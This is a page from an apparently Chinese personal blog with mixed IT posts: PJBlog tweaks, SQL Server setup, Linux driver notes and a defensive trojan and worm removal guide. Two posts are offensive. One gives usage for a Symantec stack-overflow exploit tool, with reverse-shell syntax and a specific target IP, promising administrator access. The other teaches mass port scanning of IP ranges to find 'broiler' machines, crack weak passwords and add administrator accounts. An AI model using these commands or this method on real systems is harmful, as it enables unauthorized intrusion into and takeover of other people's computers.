18 2007

美女逗老公开心

Posted by Yangybcy in 日记

之搞笑

收藏与分享
17 2007

pjblog修改技巧汇总

Posted by Yangybcy in 资料

   一、日志回复框中的表情一行显示的个数,怎么修改?
标准的是8个,我想修改成每行5个,因为我上传的表情尺寸有点大,造成页面扩大,有点混乱  
方法:用记事本打开common目录中的UBBconfig.asp文件/——查找下面的代码:
程序代码
if SmilieCount=8 then SmilieHtml=SmilieHtml+"</tr>":SmilieCount=0
看到8了吧?修改成5就可以了……
二、为什么后台添加了友情连接,可是不在首页显示?
进入后台——[友情连接管理]——看到你添加的连接后面的这个图标了没?,点一下,提示你的友情连接置顶了,变成图标,那么你添加的友情连接就在首页显示了。
一句话,置顶的友情连接才在首页显示,不置顶的友情连接只在[更多连接]页面显示
三、怎么在首页底部添加备案号和统计代码或者编辑底部的一些信息?
用记事本打开根目录下的foot.asp文件/找到下面的代码:
程序代码
<a href="http://www.miibeian.gov.cn" style="font-size:12px"><b><%=blogabout%></b></a>
<%=blogabout%>替换成你的备案号就可以了,其实还有个非常简单的方法,啥方法?哈哈,后台可以添加的!俺开始犯混了,没注意……进入后台——[站点基本信息]——看到了没啊?没看到我就晕了哈~!
统计代码怎么加?晕了,随便找个位置加上你的统计代码就可以了啊,不过要找个适合的地方添加……
看到底部哪些信息不希望出现,就在这个文件里去掉那些代码就可以了……
版权信息也可以去掉的,但是本人希望大家尊重舜子和其他人的劳动成果,请保留版权信息!!!!!!!!!加个版权信息又不碍事!
版权信息代码:
程序代码
<p>Powered By <a href="http://www.pjhome.net" target="_blank"><strong>PJBlog2 v<%=blog_version%></strong></a> CopyRight 2005, <strong><%=SiteName%></strong>
风格信息代码:
程序代码
<%=SkinInfo%>
别的自己随便改吧,看这哪不希望出现就去掉哪个代码就可以了……
四、建站时间怎么修改?
进后台修改就成了——[界面与插件]——[设置模块]找到模块标记[BlogInfo]——[可视化编辑],自己随便修改就行了,也可以把不需要的统计去掉的,我就去掉了[引用]和[在线会员],我进的是[HTML编辑],都一样的修改,没事……
五、使用留言本?
进入后台——[界面与插件]——[安装模块插件],然后选择要安装的插件,点[安装此插件]就行了。。
PJBLOG自带三个插件,有留言本插件和最新文章插件、个人档案插件。
我就用了两个插件,觉得多了也没用,如果你还需要更多的插件,就到官方论坛上去下载去吧,安装新插件我还没安装过,暂时不会安装……
六、如何修改首页每篇日志显示的字数?
刚开始俺很笨啊,就是没找到限制显示字数的地方,就上后台里改。。真可怜那
如果你要统一编辑首页每篇日志显示的字数,可以进入后台——[站点基本信息]——[日志保存设置],你可以修改显示的字数或者行数——[两种选择的]
顺便说一句,在[站点基本信息]可以随便修改你想要的设置,俺把会员注册给关拉,嘿嘿。。。
好了,说说怎么正确合适的如何修改首页每篇日志显示的字数,发表日志的时候,在编辑框的下面看到[内容摘要]了没?——选定[编辑内容摘要],好了,把这个日志想要在首页显示的内容复制到里面吧……
字数?自己去数吧,哈哈,可以选定那些内容在首页显示,其实这个可比显示的字数更好用啊。
七、修改const.asp里面的数据库路径和Cookie名称,以确保你的站点安全
别说这个你也不会。。这个提示是在程序中带着的说明文件。。
到根目录中找到const.asp文件,用记事本打开,查找下面的代码(其实里面有文字提示的,一找就找到的):
程序代码
'定义数据库链接文件,根据自己的情况修改
Const AccessFile="blogDB/PBLog2.asp"
定义 Cookie,Application 域,必须修改,否则可能运行不正常
Const CookieName="XXX"
Const CookieNameSetting="XXXSetting"
Const IPViewURL="http://www.dheart.net/ip/index.php?ip=" 'IP查询网站地址
Response.Cookies(CookieNameSetting).Expires=Date+365
把PBLog2.asp修改成一个复杂的名字,要复杂啊,呵呵,省的数据库容易丢失,修改以后,然后打开blogDB目录,给PBLog2.asp文件,然后重命名,啥名字?你刚才修改的名字啊!Cookie名称自己随便修改就成的。
八、怎么安装皮肤(风格)?
先问一下,会设置默认的风格不?晕了,不会?赶紧进后台——[模块与插件]——[设置外观],选择一个风格后,点[设置为当前主题],就设定好默认的风格了/
到官方论坛上下载一个风格,解压下载的文件夹,将文件夹XXXXX(里面包含UBB文件夹和其他文件)上传到Skins文件夹中就可以了,那么后台——[模块与插件]——[设置外观]里就自动添加了一个风格,赶紧去试一下新风格!
九、去掉编辑日志后,文章底部出现“[本日志由 某某 于 何时 编辑]”的字样
PJBlog2 v2.5版本:用记事本打开根目录下的blogedit.asp文件,找到并删除下面这一句代码:
程序代码
if weblog("log_IsDraft")=false then weblog("log_Modify")="[本日志由 "&memName&" 于 "&DateToStr(now(),"Y-m-d H:I A")&" 编辑]"
PJBlog2 v2.6版本:用记事本打开class目录下的cls_logaction.asp文件,找到并删除下面这一句代码:
程序代码
if logIsDraft=false then weblog("log_Modify")="[本日志由 "&memName&" 于 "&DateToStr(now(),"Y-m-d H:I A")&" 编辑]"
十、去掉风格中的超级链接的下划线
打开Skins文件夹中每个风格的link.css文件,用记事本打开,有下划线的参数是“text-decoration:underline”,没有下划线的参数是“text-decoration:none”。如果不使用“text-decoration”属性,默认是有下划线的。你可以把不想要下划线的地方由“underline”替换成“none”,或者干脆把所有的都替换了。我啊,就是全部给弄成没有下划线了,哈哈有下划线的确很难看啊……
十一、PJBlog2插件:Site Focus – 站点聚焦插件 作者:jerry(06-05-22)
插件说明:Site Focus,站点聚焦。
和很多大型门户网站一样,在首页上轮流变化一些图片来链接到对应的地址。特别适合做网站聚焦和一些广告。本插件可以在后台设置5个焦点,每个焦点有自己对应的图片、链接地址、说明文字,可以设定前台的显示大小,在前台通过各种过渡样式轮流变换链接图片,以此达到“聚焦”的目的。
安装方法:将SiteFocus文件夹上传到空间的Plugins文件夹下面,然后在后台安装就可以了。
插件下载地址: "_blank" rel="external">http://www.finalsky.com.cn/article.asp?id=9
十二:PJBlog2插件:TimeCounter 作者:jerry(06-05-22)
插件说明:倒计时插件,在后台可以设置4个选项:计时标题、目标日期(形式如yyyy-mm-dd)、目标时间(24小时制,形式如hh:mm:ss)、计时牌样式,离目标时间小于3天的时候会自动变为红色提醒,超出目标时间则提示过期失效。本插件同时支持IE、Firefox。
安装方法:将TimeCounter文件夹上传到空间的Plugins文件夹下面,然后在后台安装就可以了。
插件下载地址:http://www.finalsky.com.cn/article.asp?
十三、搜索关键字不能少于3个字怎么修改?
在后台[界面插件]——[搜索Search模块]那里[编辑html],改为:
<form style="MARGIN: 0px" onsubmit="if (this.SearchContent.value.length<2) {alert('关键字不能少于2个子');this.SearchContent.focus();return false}" action="search.asp">
十四、后台“查看访客记录”一片空白,是什么原因?
后台——站点基本设置——访客记录最大值“填数字”…100000000,爱填多少是多少。能不填,如果为0访客记录里面就什么也看不到  
十五、首页显示的缩略图片大小修改
找到文件夹common,打开里面的common.js文件,修改下面的代码(其实我也不知道500和400之间有什么区别,我就把500和400全部改成550了,省的麻烦。)
程序代码
//查找网页内宽度太大的图片进行缩放以及PNG纠正
function ReImgSize(){
  for (i=0;i<document.images.length;i++)
   {
   if (document.all){
    if (document.images[i].width>500)
     {
       document.images[i].width="500"
       document.images[i].outerHTML='<a href="'+document.images[i].src+'"  
target="_blank" title="在新窗口打开图片">'+document.images
[i].outerHTML+'</a>'
       }
   }
  else{
    if (document.images[i].width>400) {
      document.images[i].title="在新窗口打开图片"
      document.images[i].style.cursor="pointer"
      document.images[i].onclick=function(e){window.open(this.src)}
    }
  }
  }
}
十六、皮肤转换插件(2006-06-05)
插件名称:Skin Switcher
插件版本:1.0
插件作者:舜子
插件说明:给PJBlog2一个快速切换Skin的功能,安装插件后台,到插件的高级设置选择允许访客自己更改的Skin。
下载地址:http://www.pjhome.net/article.asp?id=504
十七、图文混编的时候,怎么把图插文字左边或右边?
UBB编辑器,用代码UBB编辑器,用代码
[ img=left]http://xxx.com/xxx.jpg[ /img] ([]号内没有空格)
十八、怎么修改“查看更多…”成为“[阅读全文]”
将class目录下的文件cls_logaction.asp和cls_default.asp中的“查看更多…”换成“[阅读全文]”,然后重新编辑日志并保存就可以了。
十九、 PJBLOG发表新日志发送引用信息失败的修正方法  
参考:http://www.lnuu.com/article.asp?id=857
二十、美化PJBLOG的标签云集
参考:http://www.lnuu.com/article.asp?id=877
二十一、禁止游客发表评论时,修改其提示语言“你没有发表评论的权限!”
修改class/cls_article.asp文件中相应的地方即可,即把上面的提示语言替换。
二十二、在文章中添加Google Adsense广告
1、静态日志模式。。。
打开Template/Article.asp,找到以下代码(第20行):
引用内容
<div id="logPanel" class="Content-body">
                  <$ArticleContent$>
<br/><br/>
然后把你的Google Adsense广告代码加入,如下示例:
引用内容
<div id="logPanel" class="Content-body">
                  <$ArticleContent$>
<br/><br/>
Google Adsense广告代码
                 </div>
2、动态日志模式。。。。
修改class/cls_article.asp文件。
放置位置为:
引用内容
<div class="Content-body">
                                            <%if len(log_ViewArr(16,0))>0 then response.write (log_ViewArr(16,0)&"<br/>")%>
Google Adsense广告代码  
<br /><img src="images/From.gif" style="margin:4px 2px -4px 0px" alt=""/><strong>
3、保存所修改的文件,上传到ftp空间,然后进入后台,【站点基本设置】——【初始化数据】即可。
4、如果想把Google Adsense广告放在文章顶部后者侧边栏,在后台建立【内容模块】,然后在模块里添加广告代码就可。
二十三、解决PJBLOG表情框无法在火狐2.0浏览器中调出
参考:http://www.lnuu.com/article.asp?id=1008
二十四、修改验证码,使它永远只出现四个“0”
找到common\GetCode.asp,修改“Dim i, ii, iii”下面这两句(第16、17行):
Const cOdds = 0 ' (说明:不出现杂点)
Const cAmount = 1 ' (说明:就取一个符号,默认是0)
二十五、防止垃圾引用
1、把trackback.asp删除,拒绝此功能(慎用)

收藏与分享
09 2007

Symantec远程管理堆栈溢出利用工具

Posted by Yangybcy in 电脑网络

Symantec远程管理堆栈溢出利用工具

Symantec remote management stack buffer overflow exploits for Win32/x86

扫描2967 2976这两个端口

成功率在30%-40% /

正向
s -r ip -p 2976

反向
s -r ip -l 你的ip -d 你的端口

PS:  
s -r 61.100.149.160

可得到管理员权限

收藏与分享
08 2007

以单用户模式启动SQL

Posted by Yangybcy in 电脑网络

如何在单用户模式下启动 SQL Server 的默认实例(命令提示符)
在单用户模式下从命令提示符启动 SQL Server 的默认实例

从命令提示符输入:
sqlservr.exe -c -m


说明  在启动 sqlservr.exe 之前,必须在命令窗口中切换到适当的目录(要启动的 Microsoft&reg; SQL Server™ 实例所在的目录)。



重要  启动 SQL Server 实例时,必须从实例所在的适当目录使用 sqlservr 应用程序。对于默认实例,从 \MSSQL\Binn 目录运行 sqlservr。对于命名实例,在 \MSSQL$instance_name\Binn 目录运行 sqlservr。


-c

表示以独立于 Windows NT 服务控制管理器的方式启动 SQL Server 实例。当从命令提示符下启动 SQL Server 时,可使用该选项缩短启动 SQL Server 的时间。(注意:当使用该选项时,无法通过使用 SQL Server 服务管理器或 net stop 命令停止 SQL Server,而且如果已从 Microsoft Windows NT&reg; 系统注销,则 SQL Server 将停止运行。)

-m

表示在单用户模式下启动 SQL Server 实例。如果 SQL Server 是以单用户模式启动的,则只能连接一个用户。CHECKPOINT 机制(它确保完成的事务定期从磁盘高速缓存写入数据库设备中)将不启动。(一般情况下,如果您遇到需要修复的系统数据库问题时,可使用此选项。)



另外,你还可以用系统存储过程sp_attach_db或sp_attach_single_file_db向master数据库报告用户数据库的信息!

收藏与分享
08 2007

用普通用户运行sql2000的所需权限说明

Posted by Yangybcy in 电脑网络


一般地,我们建议C盘分区在15G以上,SQL 2000可以直接安装在C:盘默认目录,权限就可以参考视频来设置。一般情况下,SQL 2000使用的空间不会超过3G,就算是有MySQL数据库,它的大小了不会超过2G,这是显而易见的,如果数据库一超过1G你的服务器就需要大量的内存才能正常运行,例如2G的内存,所以,做虚拟主机运营的数据库是不可能太大的,根本没有这么多内存可用。

C盘需要以下权限:
C:\administrators 全部权限
System 全部权限
IIS_WPG只读与运行的权限(只应用在当前文件夹)
SQL2000的运行用户(只应用在当前文件夹)
列出文件夹/读数据
读属性
读扩展属性
读取权限

C:\Program Files\Microsoft SQL Server\MSSQL\Data (如果此目录用来放置SQL2000用户数据库)
administrators 全部权限
System 全部权限
SQL2000的运行用户全部权限



如果你的数据库是装在c盘,但用户的库目录是放在F:\SQLDATA目录,并有备份数据库放在这个盘,F盘就需要有以下的权限:

F:\ (如果此分区用来放置SQL2000用户数据库)
administrators 全部权限
System 全部权限
SQL2000的运行用户(只应用在当前文件夹)
列出文件夹/读数据
读属性
读扩展属性
读取权限

F:\SQLDATA (如果此目录用来放置SQL2000用户数据库)
administrators 全部权限
System 全部权限
SQL2000的运行用户全部权限

F:\SQLBACK (如果此目录用来放置SQL2000备份数据库)
administrators 全部权限
System 全部权限
SQL2000的运行用户全部权限

这儿说的"SQL2000的运行用户",就是在SQL 2000企业管理器,属性中的安全中设置的用户,默认一般是System,如果您看过了"星外安全包视频说明",应该已将此用户更改,应该使用更改后的用户名。

收藏与分享
07 2007

S.exe使用介绍

Posted by Yangybcy in 资料

S.exe这款DOS下的端口扫描工具,体积小,扫描速度惊人,但是唯一不足的是它不能在XP SP2或者内网中使用SYN方式扫描,我试过,不能扫出任何IP,用TCP倒是可以,其他都不错。

介绍一下这款小工具的语法:

S扫描器扫描命令是:
-----------------------------
文件名 参数 起始IP 结束IP 要扫描的端口 保存
s SYN 61.0.0.0 61.255.255.255 1433 save
-----------------------------
1433是SQL server 服务器端口
8080是代理服务器端口
s.exe syn 219.136.0.0 219.136.255.255 8080 700 /save

s.exe扫描器的使用说明

首先我解释下什么是S扫描器,S扫描器是针对微软ms04045漏洞出的一个扫描,原来作者出这东西的目的是为了扫描这个漏洞,但现在已经变成我们黑客手中的兵器了,大家也许看过很多如何找肉鸡的动画或刷QB的动画,那些动画里面很多都是用S扫描器来扫描肉鸡或别人电脑所开放的端口及一些漏洞,都用这工具的好处是它的扫描速度实在是一个字—强! 今天我就来教下大家如何使用S扫描器。

简单说明下它的用处:

S扫描器是一个简单的使用两种常用的扫描方式进行端口扫描的端口扫描器程序.可实现的功能是:
1.两种不同的扫描方式(SYN扫描和一般的connect扫描)
2.可以扫描单个IP或IP段所有端口
3.可以扫描单个IP或IP段单个端口
4.可以扫描单个IP或IP段用户定义的端口
5.可以显示打开端口的banner
6.可将结果写入文件
7.TCP扫描可自定义线程数

用法:
--------------------------------
scanner TCP/SYN StartIP [EndIP] Ports [Threads] [/Banner][/Save]
--------------------------------

参数说明:
TCP/SYN -> TCP方式扫描或SYN方式扫描(SYN扫描需要在win 2k或以上系统才行),SYN扫描对本机无效
StartIP -> 起始扫描的IP
EndIP -> 结束扫描的IP,可选项,如果这一项没有,就只是对单个IP扫描
Ports -> 可以是单个端口,连续的一段端口或非连续的端口
Threads -> 使用最大线程数去扫描(SYN扫描不需要加这一项),不能超过1024线程
/Banner -> 扫描端口时一并将Banner显示出来,这一选项只对TCP扫描有效
/Save -> 将结果写入当前目录的Result.txt文件中去。

我们先点击开始菜单—>运行—>CMD.EXE,因为我把扫描器放在F盘,你们的扫描器放哪你们就进哪里,打开S扫描器,下面举几个例子演示下S扫描器的主要几个作用。

例子一:
S TCP 218.80.12.1 218.80.12.123 80 512
TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,最大并发线程是512

例子二:
S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner
TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,最大并发线程是512,并显示Banner

例子三:
S TCP 218.80.12.1 218.80.12.12 1-200 512
TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,最大并发线程是512

例子四:
S TCP 218.80.12.7 1-200 512
TCP扫描218.80.12.7这IP中的1到200端口,最大并发线程是512

例子五:
S SYN 218.80.12.7 1-65535 /Save
SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt
扫描结束后Result.txt就存放在你的S扫描器所在的目录里。刚才扫描的东西都在里面。

例子六:
S SYN 218.80.12.1 218.80.12.255 21 /Save
SYN扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt
这个我重点说明一下,因为这条命令就是专门用来找肉鸡的,扫描一个IP段有没有开3389的或1433的。
示范:S SYN 218.80.1.1 218.80.255.255 3389 /Save (找开放3389肉鸡的指令)
一定会有好多开了3389的,大家只要利用这指令扫到开3389的IP,再用别工具继续扫开了3389的肉鸡的弱口令,找到了马上建立管理员,登陆进去,你就算得到一个肉鸡了。
参考资料:http://www.myjxtx.com/hphtml/?thread-20312.html

收藏与分享
31 2007

ARP和RARP

Posted by Yangybcy in 电脑网络

arp是地址解析协议
主要是各个端口用来发送自己的ip地址寻找MAC地址
rarp是逆向地址解析协议
在广播中发送自己的mac地址
以了解本断口的ip地址

ARP是IP到MAC
RARP是MAC到IP

收藏与分享
30 2007

在LINUX下面安装e1000网卡

Posted by Yangybcy in Linux

今天一台Xeon3.0的机器 主板是IntelS5000VSA型的。
客户要求装红旗系统 。装好后,识别不到网卡。

从网上下得驱动。
解压

读ReadMe

开始rpmbuild -tb ***.tar.gz

然后tar zxvf ***.tar.gz

进入刚解压的目录
drivers/src/

执行make install

默认是安装到
/lib/modules/<KERNEL VERSION>/kernel/drivers/net/e1000/e1000.ko


哈哈  下面是ReadMe

Building and Installation
=========================

To build a binary RPM* package of this driver, run 'rpmbuild -tb
<filename.tar.gz>'.  Replace <filename.tar.gz> with the specific filename
of the driver.

NOTE: For the build to work properly, the currently running kernel MUST
      match the version and configuration of the installed kernel sources.
      If you have just recompiled the kernel reboot the system now.

      RPM functionality has only been tested in Red Hat distributions.

1. Move the base driver tar file to the directory of your choice.  For
   example, use /home/username/e1000 or /usr/local/src/e1000.

2. Untar/unzip archive:

     tar zxf e1000-x.x.x.tar.gz

3. Change to the driver src directory:

     cd e1000-x.x.x/src/

4. Compile the driver module:

     make install

   The binary will be installed as:

     /lib/modules/<KERNEL VERSION>/kernel/drivers/net/e1000/e1000.[k]o

   The install locations listed above are the default locations.  They
   might not be correct for certain Linux distributions.  For more
   information, see the ldistrib.txt file included in the driver tar.

5. Load the module using either the insmod or modprobe command:

     modprobe e1000

     insmod e1000

   Note that for 2.6 kernels the insmod command can be used if the full
   path to the driver module is specified.  For example:

     insmod /lib/modules/<KERNEL VERSION>/kernel/drivers/net/e1000/e1000.ko

   With 2.6 based kernels also make sure that older e1000 drivers are
   removed from the kernel, before loading the new module:

     rmmod e1000; modprobe e1000


6. Assign an IP address to the interface by entering the following, where
   x is the interface number:

     ifconfig ethx <IP_address>

7. Verify that the interface works.  Enter the following, where <IP_address>
   is the IP address for another machine on the same subnet as the
   interface that is being tested:

     ping  <IP_address>    

收藏与分享
29 2007

安装RED HAT AS4 64位FOR EM64T 重启问题

Posted by Yangybcy in Linux

halt 正常

REBOOT
init 6 重启

报:acpi :invalid reset regiset bit width:0×0
不停地报:acpi :invalid reset regiset bit width:0×0
acpi :invalid reset regiset bit width:0×0
acpi :invalid reset regiset bit width:0×0
acpi :invalid reset regiset bit width:0×0
acpi :invalid reset regiset bit width:0×0
acpi :invalid reset regiset bit width:0×0
acpi :invalid reset regiset bit width:0×0

 

-------

从新安装  在boot:下敲 linux acpi=noirq

as4改用新的acpi管理还有一些bug,等出高的update吧  as3用的apm就很稳定

--------

安装完后,在/boot/grub.conf里,修改kernel行,增加acpi=off
也可以….

收藏与分享
13 2007

彻底解决services.exe进程病毒(转自网易)

Posted by Yangybcy in 电脑网络
彻底解决services.exe进程病毒(转自网易)
2007-08-11 08:29

1 services.exe – services – 进程介绍

进程文件: services or services.exe

进程名称: Windows Service Controller

进程类别:其他进程

英文描述:

services.exe is a part of the Microsoft Windows Operating System and manages the operation of starting and stopping services. This process also deals with the automatic starting of services during the computers boot-up and the stopping of servicse durin

中文参考:

services.exe是微软Windows操作系统的一部分。用于管理启动和停止服务。该进程也会处理在计算机启动和关机时运行的服务。这个程序对你系统的正常运行是非常重要的。注意:services也可能是W32.Randex.R(储存在%systemroot%\system32\目录)和Sober.P (储存在%systemroot%\Connection Wizard\Status\目录)木马。该木马允许攻击者访问你的计算机,窃取密码和个人数据。该进程的安全等级是建议立即删除。

出品者:Microsoft Corp.

属于:Microsoft Windows Operating System

系统进程:Yes

后台程序:Yes

网络相关:No

常见错误:N/A

内存使用:N/A

安全等级 (0-5): 0

间谍软件:No

广告软件:No

病毒:No

木马:No

这个后门还不错,也有点BT吧,共产生14个文件+3个快捷图标+2个文件夹。注册表部分,除了1个Run和System.ini,比较有特点是,非普通地利用了EXE文件关联,先修改了.exe的默认值,改.exe从默认的 exefile更改为winfiles,然后再创建winfiles键值,使EXE文件关联与木马挂钩。即为中毒后,任意一个EXE文件的属性,“应用程序”变成“EXE文件”

当然,清除的方法也很简单,不过需要注意步骤:

一、注册表:先使用注册表修复工具,或者直接使用regedit修正以下部分

1.SYSTEM.INI (NT系统在注册表: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)

shell = Explorer.exe 1 修改为shell = Explorer.exe

2.将 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的

Torjan Program———-C:\WINNT\services.exe删除

3. HKEY_Classes_root\.exe

默认值 winfiles 改为exefile

4.删除以下两个键值:

HKEY_Classes_root\winfiles

HKEY_Local_machine\software\classes\winfiles

5. 打开注册表编辑器,依此分别查找“rundll32.com”、“finder.com”、“command.pif”,把找到的内容里面的“rundll32.com”、“finder.com”、“command.pif”分别改为“Rundll32.exe”

6. 查找“iexplore.com”的信息,把找到的内容里面的“iexplore.com”改为“iexplore.exe”

7. 查找“explorer.com”的信息,把找到的内容里面的“explorer.com”改为“explorer.exe”

8. 查找“iexplore.pif”,应该能找到类似“%ProgramFiles%\Common Files\iexplore.pif”的信息,把这内容改为“C:\Program Files\Internet Explorer\iexplore.exe”

9. 删除病毒添加的文件关联信息和启动项:

[HKEY_CLASSES_ROOT\winfiles]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Torjan Program"="%Windows%\services.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]

"Torjan Program"="%Windows%\services.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"Shell"="Explorer.exe 1"

改为

"Shell"="Explorer.exe"

10. 这些是病毒释放的一个VB库文件(MSWINSCK.OCX)的相关信息,不一定要删除:

HKEY_CLASSES_ROOT\MSWinsock.Winsock

HKEY_CLASSES_ROOT\MSWinsock.Winsock.1

HKEY_CLASSES_ROOT\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}

HKEY_CLASSES_ROOT\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}

注:因为病毒修改了很多关联信息,所以在那些病毒文件没有被删除之前,请不要做任何多余的操作,以免激活病毒

二、然后重启系统,删除以下文件部分,注意打开各分区时,先打开“我的电脑”后请使用右键单击分区,选“打开”进入。或者直接执行附件的Kv.bat来删除以下文件

c:\antorun.inf (如果你有多个分区,请检查其他分区是否有这个文件,有也一并删除)

%programfiles%\common files\iexplore.pif

%programfiles%\Internat explorer\iexplore.com

%windir%\1.com

%windir%\exeroute.exe

%windir%\explorer.com

%windir%\finder.com

%windir%\mswinsck.ocx

%windir%\services.exe

%windir%\system32\command.pif

%windir%\system32\dxdiag.com

%windir%\system32\finder.com

%windir%\system32\msconfig.com

%windir%\system32\regedit.com

%windir%\system32\rundll32.com

删除以下文件夹:

%windir%\debug

%windir%\system32\NtmsData

 

一、病毒评估

1. 病毒中文名: SCO炸弹变种N

2. 病毒英文名: Worm.Novarg.N

3. 病毒别名: Worm.Mydoom.m

4. 病毒大小: 28832字节

5. 病毒类型: 蠕虫病毒

6. 病毒危险等级: ★★★★

7. 病毒传播途径: 邮件

8. 病毒依赖系统: Windows 9X/NT/2000/XP

二、病毒的破坏

1. 通过电子邮件传播的蠕虫病毒,感染之后,它会先在用户本地机器上搜索电子邮件地址,向其发送病毒邮件;

2. 利用在本机上搜索到的邮件地址的后缀当关键词,在Google、Yahoo等四个搜索引擎上搜索相关的email地址,发送病毒邮件传播自身。

3. 大量发送的搜索请求使这四个搜索引擎的运行速度明显变慢。

4. 感染了此病毒的机器,IE浏览器、OE软件和Outlook软件都不能正常使用。

5. 病毒大量向外发送病毒邮件,严重消耗网络资源,可能造成局域网堵塞。

三、技术分析

1. 蠕虫病毒,采用Upx压缩。运行后,将自己复制到%WINDOWS%目录下,文件名为:java.exe。释放一个后门病毒在同一目录中,文件名为:services.exe。

2. 在注册表启动项“\CurrentVersion\Run”下加入这两个文件的启动键值:JavaVM和Service,实现病毒的开机自启动。

3. 强行关闭IE浏览器、OE软件和Outlook软件,使其不能正常使用。

4. 在本地机器上搜索电子邮件地址:从注册表中读取当前系统当前使用的wab文件名,并在其中搜索email地址;搜索internet临时目录 (Local Settings\Temporary Internet Files)中的文件,从中提取电子邮件地址;遍历盘符从C:盘到Z:的所有硬盘,并尝试从以下扩展名文件中提取email地址:.adb ,.asp ,.dbx ,.htm ,.php ,.pl ,.sht ,.tbb ,.txt ,.wab。

5. 当病毒搜索到email地址以后,病毒以“mailto+%本地系统搜出的邮件地址%”、“reply+%本地系统搜出的邮件地址%”、 “{|contact+| |e| |-| |mail}+%本地系统搜出的邮件地址%”为关键字,利用以下四种搜索引擎进行email地址邮件搜索:search.lycos.com、 search.yahoo.com、www.altavista.com、www.google.com,利用这种手段,病毒能够搜索到非常多的可用邮件 地址。

6. 病毒邮件的附件名称为:readme ,instruction ,transcript ,mail ,letter ,file ,text ,attachment等,病毒附件扩展名为:cmd ,bat ,com ,exe ,pif ,scr ,zip。

四、病毒解决方案:

1. 进行升级

瑞星公司将于当天进行紧急升级,升级后的软件版本号为16.37.10,该版本的瑞星杀毒软件可以彻底查杀“SCO炸弹变种N”病毒,瑞星杀毒软件标准版和网络版的用户可以直接登陆瑞星网站( http://www.rising.com.cn/ )下载升级包进行升级,或者使用瑞星杀毒软件的智能升级功能。

2. 使用专杀工具

鉴于该病毒的特性,瑞星公司还为手中暂时没有杀毒软件的用户提供了免费的病毒专杀工具,用户可以到: http://it.rising.com.cn/service/technology/tool.htm 网址免费下载使用。

3. 使用在线杀毒和下载版

用户还可以使用瑞星公司的在线杀毒与下载版产品清除该病毒,这两款产品是通过手机付费使用的,用户可以登陆 http://online.rising.com.cn/ 使用在线杀毒产品,或者登陆 http://go.rising.com.cn/ 使用下载版产品。

4. 打电话求救

如果遇到关于该病毒的其它问题,用户可以随时拨打瑞星反病毒急救电话:010-82678800来寻求反病毒专家的帮助!

5. 手动清除

(1)结束系统中进程名为:Services.exe和java.exe(在%windows%目录中)

(2)删除系统临时目录中的两个病毒数据文件:MLITGB.LOG和ZINCITE.LOG

(3)删除病毒键立的注册表键:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

“JavaVM”=%WINDOWS%\java.exe

和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

“Services”=%WINDOWS%\Services.exe

注: %WINDOWS% 是指系统的windows目录,在Windows 9X/ME/XP下默认为:

C:\WINDOWS,Win2K下默认为:C:\WINNT

注: %WINDIR%指的是Windows系统的安装目录,在Windows 95/98/ME/XP操作系统下默认为:C:\WINDOWS目录,在WINDOWS2000操作系统下默认为:C:\WINNT目录。

五、安全建议:

1. 建立良好的安全习惯。 例如:对一些来历不明的邮件及附件不要打开,不要上一些不太了解的网站、不要执行从 Internet 下载后未经杀毒处理的软件等,这些必要的习惯会使您的计算机更安全。

2. 关闭或删除系统中不需要的服务。 默认情况下,许多操作系统会安装一些辅助服务,如 FTP 客户端、Telnet 和 Web 服务器。这些服务为攻击者提供了方便,而又对用户没有太大用处,如果删除它们,就能大大减少被攻击的可能性。

3. 经常升级安全补丁。 据统计,有80%的网络病毒是通过系统安全漏洞进行传播的,象蠕虫王、冲击波、震荡波等,所以我们应该定期到微软网站去下载最新的安全补丁,以防范未然。

4. 使用复杂的密码。 有许多网络病毒就是通过猜测简单密码的方式攻击系统的,因此使用复杂的密码,将会大大提高计算机的安全系数。

5. 迅速隔离受感染的计算机。 当您的计算机发现病毒或异常时应立刻断网,以防止计算机受到更多的感染,或者成为传播源,再次感染其它计算机。

6. 了解一些病毒知识。 这样就可以及时发现新病毒并采取相应措施,在关键时刻使自己的计算机免受病毒破坏。如果能了解一些注册表知识,就可以定期看一看注册表的自启动项是否有可疑键值;如果了解一些内存知识,就可以经常看看内存中是否有可疑程序。

7. 最好安装专业的杀毒软件进行全面监控。 在病毒日益增多的今天,使用杀毒软件进行防毒,是越来越经济的选择,不过用户在安装了反病毒软件之后,应该经常进行升级、将一些主要监控经常打开(如邮件监控)、内存监控等、遇到问题要上报, 这样才能真正保障计算机的安全。

8. 用户还应该安装个人防火墙软件进行防黑。 由于网络的发展,用户电脑面临的黑客攻击问题也越来越严重,许多网络病毒都采用了黑客的方法来攻击用户电脑,因此,用户还应该安装个人防火墙软件,将安全级别设为中、高,这样才能有效地防止网络上的黑客攻击。

收藏与分享
Pages: 上一页 1 2 3 ...34 35 36 ...40 41 42 下一页